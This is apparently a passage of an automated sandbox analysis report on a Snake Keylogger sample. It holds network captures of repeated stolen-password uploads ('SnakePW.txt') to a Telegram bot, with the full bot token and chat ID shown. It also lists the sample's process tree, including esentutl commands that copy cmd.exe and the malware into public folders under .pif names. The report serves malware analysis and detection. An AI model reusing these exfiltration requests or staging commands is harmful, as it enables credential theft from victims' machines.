                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:37 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389029,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605997,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                96 | 192.168.2.7 | 50027 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:26:37 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd131d191f6227
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:37 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd131d191f6227Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:37 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:37 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:37 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389028,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605997,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                97 | 192.168.2.7 | 50031 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:26:39 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd1197e49d4113
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:39 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd1197e49d4113Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:39 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:39 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:39 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389031,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605999,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.7 | 50033 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:39 UTC | 358 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd11aa88ccb890
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
2024-11-26 07:26:39 UTC | 537 | OUT | Data Ascii: --------------------------8dd11aa88ccb890Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:26:39 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:39 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:39 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":389032,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605999,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.7 | 50032 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:39 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd13bb487a2aa3
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:39 UTC | 537 | OUT | Data Ascii: --------------------------8dd13bb487a2aa3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:26:39 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:39 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:39 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":389033,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605999,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.7 | 50040 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:41 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd11dc4fb6d2d1
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:41 UTC | 537 | OUT | Data Ascii: --------------------------8dd11dc4fb6d2d1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:26:41 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:41 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:41 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":389038,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732606001,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.7 | 50039 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:41 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd11c811aae335
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:41 UTC | 537 | OUT | Data Ascii: --------------------------8dd11c811aae335Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:26:41 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:41 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:41 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":389039,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732606001,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.7 | 50041 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:41 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd1423a1fed966
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:41 UTC | 537 | OUT | Data Ascii: --------------------------8dd1423a1fed966Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:26:41 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:41 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:41 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":389040,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732606001,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.7 | 50047 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:43 UTC | 358 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd12345456dd07
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
2024-11-26 07:26:43 UTC | 537 | OUT | Data Ascii: --------------------------8dd12345456dd07Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:26:44 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:43 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:44 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":389044,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732606003,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                104 | 192.168.2.7 | 50049 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:26:43 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd14c06965d3a2
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Data Ascii: --------------------------8dd14c06965d3a2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:44 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:43 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389045,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732606003,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                105 | 192.168.2.7 | 50048 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:26:43 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd1220a2538758
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Data Ascii: --------------------------8dd1220a2538758Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:44 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:43 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389046,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732606003,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                106 | 192.168.2.7 | 50057 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:26:45 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd12a00e36c4c0
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Data Ascii: --------------------------8dd12a00e36c4c0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:46 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:45 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389050,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732606005,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                107 | 192.168.2.7 | 50055 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:26:45 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd12a75cd9b643
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Data Ascii: --------------------------8dd12a75cd9b643Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:46 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:45 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389051,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732606005,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                108 | 192.168.2.7 | 50056 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:26:45 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd155c28fa062f
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Data Ascii: --------------------------8dd155c28fa062fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:46 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:45 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389053,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732606005,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                109 | 192.168.2.7 | 50070 | 149.154.167.220 | 443
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:26:50 UTC | 358 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0dcf78ef9f83
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
                                                                                                                Data Ascii: --------------------------8dd0dcf78ef9f83Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:51 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:51 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":389056,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732606011,"documen


                                                                                                                Target ID:0
                                                                                                                Start time:02:24:39
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\user\Desktop\EPTMAcgvNZ.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\EPTMAcgvNZ.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:1'297'920 bytes
                                                                                                                MD5 hash:DC614075998696B44ADA8A2EED23FC03
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:Borland Delphi
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:9
                                                                                                                Start time:02:24:48
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\yihfsboC.cmd" "
                                                                                                                Imagebase:0x410000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:10
                                                                                                                Start time:02:24:48
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:11
                                                                                                                Start time:02:24:48
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                                Imagebase:0x9c0000
                                                                                                                File size:352'768 bytes
                                                                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:12
                                                                                                                Start time:02:24:49
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\EPTMAcgvNZ.exe /d C:\\Users\\Public\\Libraries\\Cobsfhiy.PIF /o
                                                                                                                Imagebase:0x9c0000
                                                                                                                File size:352'768 bytes
                                                                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:13
                                                                                                                Start time:02:24:49
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                File size:862'208 bytes
